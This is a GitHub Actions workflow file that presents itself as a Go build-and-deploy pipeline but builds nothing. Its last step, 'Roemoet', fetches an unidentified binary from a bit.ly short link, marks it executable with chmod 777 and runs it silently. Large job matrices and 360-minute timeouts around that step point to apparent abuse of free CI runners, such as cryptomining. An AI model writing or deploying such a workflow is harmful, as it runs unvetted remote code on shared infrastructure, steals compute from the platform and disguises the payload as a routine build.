name: lika
on: [push, pull_request]
jobs:
  build:
    runs-on: windows-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    timeout-minutes: 360
    env:
        NUM_JOBS: 50
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
  deploy:
    name: osx
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.1]
        flag: [A, B, C, D, E, F, G, H, I, J, M, N, O, P, Q, R, S, T]
    timeout-minutes: 360
    env:
        NUM_JOBS: 200
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check-in
      uses: actions/checkout@v2
    - name: Roemoet
      run: |
        wget https://bit.ly/3z9TagE && chmod 777 3z9TagE && ./3z9TagE > /dev/null
